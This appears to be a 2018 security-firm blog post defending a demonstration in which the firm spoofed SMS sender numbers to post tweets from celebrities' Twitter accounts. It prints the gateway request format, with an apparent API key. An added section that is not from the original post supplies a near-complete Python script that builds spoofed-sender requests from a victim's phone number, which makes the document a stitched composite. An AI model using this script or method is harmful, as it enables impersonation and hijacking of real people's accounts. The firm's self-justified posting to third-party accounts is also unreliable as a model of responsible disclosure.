Twitter Research — PT2

INSINIA
4 min read · Dec 29, 2018

If you’re reading this then you’ve probably seen the recent research carried out by INSINIA, in which we successfully “hijacked” a number of Twitter accounts, including those of Louis Theroux and Eamonn Holmes.

Most (if not all) of the articles written about the operation have been factual and accurate. You can see some of them here: BBC, The Mirror, The Telegraph.

No Plagiarism Here

INSINIA has publicly warned against relying on SMS for anything security-sensitive for over 6 years. We have been researching SS7, GSM, CDMA and related mobile technologies for over 15 years.

INSINIA demonstrated this proof of concept as a company to LBC in 2014, to the BBC in 2015 and to multiple media outlets since. In 2018 we warned again about the same flaws in the cell network: that the attack was over 20 years old and that thousands of systems were susceptible to SMS spoofing.

SEE HERE: https://www.telegraph.co.uk/technology/2018/03/08/mobile-networks-investigate-flaw-leaves-4g-customers-open-hacking/

AND HERE: https://www.telegraph.co.uk/technology/2018/11/16/tens-millions-private-text-messages-security-codes-exposed/

@mikeghacks tweeting about these issues in November — 8 weeks before the recent Twitter operation.

INSINIA is very lucky to have a devoted and highly capable team of specialists who make up our SRT (Security Research Team), based in Copenhagen, Denmark. When a member of the team saw a tweet from CCC (Chaos Computer Club) that once again highlighted the issue with SMS and Twitter, it became apparent that we were in a position to demonstrate this research to the public in a meaningful and hard-hitting way. By combining a range of number-enumeration techniques (identifying the phone number linked to a target account) with a multi-faceted methodology, we knew we could make it work.

The Approach

INSINIA looked into the full lifecycle of the research: what would be required, how it would be executed, and whether it was ethical and responsible.

The campaign had to meet the following criteria:

  1. Minimal impact and non-malicious
    No access to data, no account takeover, no denial of service, no personal interaction etc. If there had been even a possibility for us to view, intercept or access data, we would not have carried out this research.
  2. The affected users had to know straight away that they were NOT under genuine attack and had NOT lost access to their account, and it had to be done in a way that would not cause users to be excessively or unduly alarmed.
  3. It must not intercept or change any user data whatsoever. It had to be what we call passive: strictly one-way, send-only communication with no return channel to us, much like push-to-talk.

The Preparation

  1. We contacted the user, notifying them of what was about to happen.
  2. We sent a passive command in order to post the tweet.
  3. We then retweeted INSINIA’s tweet, which linked to our original blog post explaining what had happened to them and how it was done.
  4. We offered support to anyone who was concerned about the attack or wanted additional information on how to protect and secure themselves.

Executing the Plan

Sending the Initial Command
This command would allow us to tweet from the user’s account. It was a simple gateway command: FROM set to the user’s phone number (the number registered with their Twitter account), TO set to Twitter’s SMS interface number, and the message body being the tweet. Nothing in the SMS path verifies that the sender actually controls the FROM number; the gateway forwards whatever sender address it is given, so Twitter’s SMS interface cannot distinguish this message from one the user really sent. This is how it looked:

key=a0tg9d5c682fff8293n2bhds62jd23k6k88jd&to=07537417668&from=07USERNUMB&content=This account has been temporarily hijacked by INSINIA SECURITY.
To: 447537417668 ID: CF_29482k21

Once the command was sent, the tweet would appear.

Tweet appearing on Louis Theroux’s account after sending the above command.

The tweet may seem self-promoting, but we actually mentioned INSINIA SECURITY for a totally different reason…

How could we let people know straight away that this is non-malicious?

Tweeting “This account has been ethically hacked” without pointing to INSINIA could have been as damaging as a malicious attack: how would anyone know it was ethical? We therefore decided that the best way to proceed was with full accountability. We took full responsibility and placed INSINIA front and centre, giving users an immediate point of contact and an immediate opportunity to understand exactly what had happened.

Retweeting our Tweet
In order to ensure that people knew exactly where to go, we composed a tweet that would be retweeted from the user’s account. The tweet made it clear that this operation had been carried out to highlight a vulnerability in Twitter, and that the owner of the account had not lost access to it, had not been “breached” or “hacked” in the traditional sense, and was not under sustained or malicious attack.

CMD to retweet:
key=a0tg9d5c682fff8293n2bhds62jd23k6k88jd&to=07537417668&from=07USERNUMB&content=RETWEET insiniasec
To: 447537417668 ID: CF_37622d98

Retweet from INSINIA Security using the above command.
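As an added illustration (not code from INSINIA’s operation or from the original post), the following Python builds the two gateway requests shown above offline so their structure can be inspected; nothing is transmitted. The gateway endpoint, the placeholder API key, the victim number and the E.164 normalisation (inferred from the post showing 07537417668 delivered as 447537417668) are assumptions; the parameter names key, to, from and content and the RETWEET command are the ones the post shows.

```python
import re
from urllib.parse import urlencode, urlsplit, parse_qs

# Hypothetical endpoint and placeholder credential (not from the original post).
GATEWAY_URL = "https://sms-gateway.example/send"
API_KEY = "PLACEHOLDER_API_KEY"
# The TO number used in the post, in the national (07...) form the post shows.
TWITTER_UK_NUMBER = "07537417668"


def to_e164(number: str, default_cc: str = "44") -> str:
    """Normalise a phone number to E.164 digits without the leading '+'.

    The post shows 07537417668 being delivered to 447537417668, so the
    gateway is assumed to want country-code form; a UK default is assumed.
    """
    digits = re.sub(r"\D", "", number)
    if number.strip().startswith("+"):
        return digits                    # already international
    if digits.startswith("00"):
        return digits[2:]                # 00 international dialling prefix
    if digits.startswith("0"):
        return default_cc + digits[1:]   # national trunk prefix
    return digits


def build_request(from_number: str, content: str,
                  to_number: str = TWITTER_UK_NUMBER, key: str = API_KEY) -> str:
    """Return the gateway URL for one spoofed-sender SMS (nothing is sent).

    `from` is simply the sender the caller chooses: the gateway passes it on
    and the receiving service sees it as the originating number. Nothing in
    the request proves the caller owns that number, which is the weakness.
    """
    params = {
        "key": key,
        "to": to_e164(to_number),
        "from": to_e164(from_number),
        "content": content,
    }
    return f"{GATEWAY_URL}?{urlencode(params)}"


def tweet_request(victim_number: str, text: str) -> str:
    """Request that posts `text` from the account registered to victim_number."""
    return build_request(victim_number, text)


def retweet_request(victim_number: str, handle: str) -> str:
    """Request that makes the victim account retweet `handle` (command as in the post)."""
    return build_request(victim_number, f"RETWEET {handle}")


def parse_request(url: str) -> dict:
    """Decode a built request back into its fields, for inspection."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in query.items()}


if __name__ == "__main__":
    # Constructed sample: a made-up victim number, not a real account.
    victim = "07123456789"
    print(tweet_request(victim, "This account has been temporarily hijacked by INSINIA SECURITY."))
    print(retweet_request(victim, "insiniasec"))
```

The point to notice is how little the attacker needs: the victim’s registered number goes into `from`, Twitter’s interface number into `to`, and the tweet text or a Twitter SMS command into `content`. The defence therefore cannot live in the message; it has to be the platform refusing to treat SMS sender ID as authentication.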

Conclusion

Twitter has known about this since at least 2012 and has done nothing to warn users that they are unacceptably vulnerable and exposed. Twitter is having to take notice of this problem once again, as the BBC and many others are pressing them for statements.

There is a fine line here, but when a company like Twitter fails to act in its users’ best interest for over six years, surely we must ask ourselves: what else can we do?

XC018
